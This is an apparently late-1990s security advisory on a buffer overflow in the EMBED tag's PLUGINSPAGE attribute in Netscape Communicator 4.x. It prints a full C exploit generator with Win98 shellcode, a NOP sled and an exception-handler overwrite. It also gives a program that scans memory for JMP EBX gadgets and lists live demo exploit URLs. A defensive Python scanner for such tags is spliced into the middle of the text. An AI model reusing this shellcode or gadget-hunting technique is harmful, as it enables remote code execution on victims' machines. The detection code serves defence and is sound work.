COMMAND
Netscape communicator
SYSTEMS AFFECTED
Netscape communicator 4.06J, 4.5J-4.6J, 4.61e
PROBLEM
DEF CON ZERO WINDOW found following. He discovered a buffer
overflow bug which causes huge security hole on the `Netscape
communicator 4.06J, 4.5J - 4.6J, 4.61e (probably, a version 3.0
after all)'. The problem of this application is in the handling
of EMBED TAG, the buffer overflow is caused if the long string is
specified at "pluginspage" option. 'defcon' coded the exploit
program to execute any command on the victim machine. He tested
it on the Windows98. However, this program specifies immediately
the address of the system() function which is defined on the
msvcrt.dll, this program does not work on the Windows machine
which is installed the other version of msvcrt.dll (This program
is for Version 6.00.83 97).
The reason 'defcon' hardcoded the address of the function is
that the buffer into which the exploit code can be written is
very short: the size of the writable buffer is about 83 bytes.
The buffer is too small to hold code that looks up the addresses
of the functions defined in "msvcrt.dll". However, this
limitation could be overcome if the exploit code contained code
that searches for the attack code and executes it; the attack
code can also be written into another buffer.
An attack code of up to 2300 bytes could be written at
stack_bottom. A trojan or virus could be written into the attack
code, so this problem is very serious. In this case, the stack
pointer (ESP) at the moment the overflow occurs differs by
environment, so the method of overwriting the RET address cannot
be used to exploit it. This example instead overwrites the
handler address for the access violation, so the exploit code is
called when the access violation is raised. When the access
violation occurs, the address of the exploit buffer is stored in
the EBX register. So, we overwrite the handler address with the
address of code containing a "JMP EBX" instruction.
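The trigger described above is entirely visible in the page content: an EMBED tag whose PLUGINSPAGE attribute is far longer than any plug-in URL, padded with a NOP sled and carrying raw bytes. The following scanner is an added example written from the defender's side, not code from the advisory or from DEF CON ZERO; it flags such tags in an HTML document before it reaches a browser. The thresholds, attribute regexes and the two embedded sample documents are constructed for this example (the "malicious" sample has the attribute shape of the published generator but filler bytes, no payload).

```python
import re

# Thresholds are assumptions chosen for this example from the advisory's
# figures: the overflowed buffer is about 83 bytes, and the published
# generator emits a PLUGINSPAGE value of over 2000 bytes led by a 588-byte
# NOP sled. No legitimate plug-in URL comes anywhere near these sizes.
MAX_ATTR_LEN = 256   # longest attribute value treated as plausible
MIN_NOP_RUN = 16     # a run of 0x90 this long never occurs in a real URL

# Naive byte-level tag and attribute parsing (assumed sufficient for 1990s HTML)
EMBED_TAG = re.compile(rb"<\s*embed\b([^>]*)>", re.IGNORECASE)
# name="value" | name='value' | name=bare
ATTR = re.compile(
    rb"""([A-Za-z_:][-A-Za-z0-9_:.]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
NON_PRINTABLE = re.compile(rb"[^\x09\x0a\x0d\x20-\x7e]")
NOP_RUN = re.compile(rb"\x90{%d,}" % MIN_NOP_RUN)


def inspect_embed_tags(html: bytes) -> list:
    """Return one finding per suspicious attribute on every EMBED tag."""
    findings = []
    for tag in EMBED_TAG.finditer(html):
        for attr in ATTR.finditer(tag.group(1)):
            name = attr.group(1).lower().decode("ascii")
            value = next(g for g in attr.groups()[1:] if g is not None)
            reasons = []
            if len(value) > MAX_ATTR_LEN:
                reasons.append("length %d exceeds %d" % (len(value), MAX_ATTR_LEN))
            if NON_PRINTABLE.search(value):
                reasons.append("non-printable bytes in attribute value")
            if NOP_RUN.search(value):
                reasons.append("run of 0x90 bytes (NOP sled)")
            if reasons:
                findings.append({"offset": tag.start(), "attr": name,
                                 "reasons": reasons})
    return findings


def has_nop_sled(html: bytes) -> bool:
    """Raw scan independent of tag parsing: a payload byte that happens to be
    '>' or '"' would end the naive tag match early, so the sled check is
    also run over the whole document."""
    return NOP_RUN.search(html) is not None


def is_suspicious(html: bytes) -> bool:
    return bool(inspect_embed_tags(html)) or has_nop_sled(html)


# Constructed sample: an ordinary plug-in reference.
BENIGN = (b'<HTML><BODY>\n'
          b'<EMBED SRC="movie.mov" PLUGINSPAGE="http://example.invalid/plugin" '
          b'TYPE="video/quicktime" WIDTH="320" HEIGHT="240">\n'
          b'</EMBED></BODY></HTML>')

# Constructed sample with the attribute shape of the advisory's generator
# (long PLUGINSPAGE, random-looking TYPE); filler bytes stand in for any payload.
MALICIOUS = (b'<HTML><BODY><EMBED SRC="FreeUNYUN!" PLUGINSPAGE="'
             + b"\x90" * 64 + b"A" * 600
             + b'" TYPE="' + b"#" * 150
             + b'" WIDTH="1500" HEIGHT="1000"></EMBED></BODY></HTML>')

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("constructed-malicious", MALICIOUS)):
        print(label, is_suspicious(doc), inspect_embed_tags(doc))
```

The attribute-length check alone catches the published generator (its PLUGINSPAGE value is STACK_LEN bytes); the non-printable and NOP-run checks are there for variants that shorten the padding but still need to carry machine code in the attribute.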
You can quickly test this exploit. 'defcon' has prepared some
versions of exploits that execute "welcome.exe" on your Windows 98
machine. If you are a user of one of the specified versions of
Netscape, please test. He did not code the exploit program for
WinNT and Win95, but they also contain the same problem.
[ exploit demo page ]
exec "welcome.exe" - nc4x_ex.c
http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_ex.cgi
exec "notepad.exe"
http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_ex2.cgi
[ exploit test ]
blue screen(int 01h)
http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_bs01.htm
nc4x_ex.c follows:
/************************************************************************/
/* Netscape communicator 4.06J - 4.6J, 4.61e Exploit for Windows98      */
/*                                                                      */
/* written by R00t Zer0(defcon0@ugtop.com)                              */
/*                                                                      */
/* DEF CON ZERO( http://www.ugtop.com/defcon0/index.htm)                */
/************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>    /* bzero() */
#include <time.h>
#include <sys/types.h>
#include <sys/stat.h>

#define STACK_LEN       ( 2135 )
#define EMBED_TYPE_LEN  ( 150 )
#define XPT_HDL_OFFSET  ( 588 )     /* offset of the exception handler address */
#define JMPS_OFFSET     ( 6 )
#define JMP_EBX_ADDR    ( 0xbff7a06b )  /* JMP EBX in Japanese Win98 kernel */
#define INT01H_ADDR     ( 0xbff73d30 )
#define NOP_CODE        ( 0x90 )
#define JMPS_CODE       ( 0xeb )
#define FUNCTION        "msvcrt.dll.system.exit."
#define COMMAND         "welcome.exe"
#define CMDLENP         ( 65 )      /* position of the command-length byte */

int
main( void )
{
    u_char win98_exec_code[100] = {
        0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,
        0xF7,0xBF,0xFF,0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,0x83,0xC3,0x06,
        0x88,0x23,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
        0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,
        0xF8,0x43,0x53,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,0x33,0xC0,0x50,
        0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,0xFF,0x00 };
    u_char exploit_code[ STACK_LEN ];
    u_char embed_type[ EMBED_TYPE_LEN ];
    u_long ip;
    int loop;

    srand( ( u_int )time( 0 ) );
    bzero( exploit_code, sizeof( exploit_code ) );

    /* NOP sled up to the handler address */
    for( loop = 0; loop < XPT_HDL_OFFSET; loop++ )
        exploit_code[ loop ] = NOP_CODE;

    /* make exploit code: short jump over the handler address, then the address itself */
    ip = JMP_EBX_ADDR;
    exploit_code[ XPT_HDL_OFFSET - 4 ] = JMPS_CODE;
    exploit_code[ XPT_HDL_OFFSET - 3 ] = JMPS_OFFSET;
    exploit_code[ XPT_HDL_OFFSET + 3 ] = ( char )( 0xff & ( ip >> 24 ) );
    exploit_code[ XPT_HDL_OFFSET + 2 ] = ( char )( 0xff & ( ip >> 16 ) );
    exploit_code[ XPT_HDL_OFFSET + 1 ] = ( char )( 0xff & ( ip >> 8 ) );
    exploit_code[ XPT_HDL_OFFSET + 0 ] = ( char )( 0xff & ( ip >> 0 ) );

    win98_exec_code[ CMDLENP ] = strlen( COMMAND );
    strcat( ( char * )exploit_code, ( const char * )win98_exec_code );
    strcat( ( char * )exploit_code, FUNCTION );
    strcat( ( char * )exploit_code, COMMAND );

    /* set random type */
    for( loop = 0; loop < EMBED_TYPE_LEN; loop++ )
        embed_type[ loop ] = 0x23 + ( rand() % 93 );
    embed_type[ EMBED_TYPE_LEN - 1 ] = '\0';

    /* print html */
    printf( "Content-type: text/html\n\n" );
    printf( "<HTML>\n" );
    printf( "<HEAD>\n" );
    printf( " <TITLE>Netscape communicator 4.x Exploit!!</TITLE>\n" );
    printf( "</HEAD>\n" );
    printf( "<BODY>\n" );
    printf( "<EMBED SRC=\"FreeUNYUN!\" PLUGINSPAGE=\"%s\" ", ( char * )exploit_code );
    printf( "TYPE=\"%s\" WIDTH=\"1500\" HEIGHT=\"1000\">\n", ( char * )embed_type );
    printf( "</EMBED>\n</BODY>\n</HTML>\n" );
    return( 0 );
}
Kerb tried the URL for notepad.exe on a Windows 95 (4.00.950a)
machine, Pentium II 266 w/ 56 MB of RAM, using Netscape
Communicator 4.05 Preview Release 1 (AWT 1.1.5), even though these
are coded for Win98. When he went there with NC 4.05, it gave him
a blue screen of death that was completely unrecoverable; he had
to reboot the system. So, basically, it is a DoS for Netscape
users, and could possibly be coded into a CGI or JavaScript that
checks the browser version and writes the corresponding exploit code.
'UNYUN' added the following. He confirmed that the exploit codes
published at the demo site were executed. They think that the
reason you cannot confirm that the exploit codes executed is the
difference in the Windows kernel code. The exploit code posted by
R00tZer0 is for Japanese Win98; this exploit uses the code
written at 0xbff7a06b. In the Japanese Windows 98 build, a JMP
EBX (FFH, E3H) instruction is written at that address. If you
remake the exploit code to exploit the specified Netscape
Communicators, you have to change the address specified in the
exploit code. You may be able to get the address of a JMP EBX
instruction with the following program. So, if someone succeeded
or could get the address at which the JMP EBX code is written,
please tell the address of the JMP EBX code to see what's up in
English Win98.
#include <windows.h>
#include <stdio.h>

/* Address ranges (start, end pairs) of the shared system DLLs to scan;
   the list is terminated by a 0,0 pair. */
unsigned int mems[]={
    0xbfb70000,0xbfbfc000,
    0xbfde0000,0xbfde6000,
    0xbfdf0000,0xbfdf5000,
    0xbfe00000,0xbfe10000,
    0xbfe30000,0xbfe43000,
    0xbfe80000,0xbfe86000,
    0xbfe90000,0xbfe96000,
    0xbfea0000,0xbfeb0000,
    0xbfee0000,0xbfee5000,
    0xbff20000,0xbff47000,
    0xbff50000,0xbff61000,
    0xbff70000,0xbffc6000,
    0xbffc9000,0xbffe3000,
    0,0};

/* Write to fp every address in [st, ed) at which the byte pair c1,c2 occurs,
   together with the four bytes found there. */
void search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
                unsigned char c1,unsigned char c2)
{
    unsigned char *p;
    fprintf(fp,"Result : %x - %x\n",(unsigned int)st,(unsigned int)ed);
    for (p=st;p<ed;p++)
        if (*p==c1 && *(p+1)==c2)
            fprintf(fp,"%x : %x %x %x %x\n",(unsigned int)p,
                    *p&255,*(p+1)&255,*(p+2)&255,*(p+3)&255);
}

int APIENTRY WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance,
                      LPTSTR lpCmdLine, int nCmdShow)
{
    FILE *fp;
    int i;
    if ((fp=fopen("adr.txt","w"))!=NULL){
        for (i=0;;i+=2){
            if (mems[i]==0) break;
            /* 0xff 0xe3 is the encoding of JMP EBX */
            search_mem(fp,(unsigned char *)mems[i],(unsigned char *)mems[i+1],0xff,0xe3);
        }
        fclose(fp);
    }
    return 0;
}
SOLUTION
This problem can't be avoided.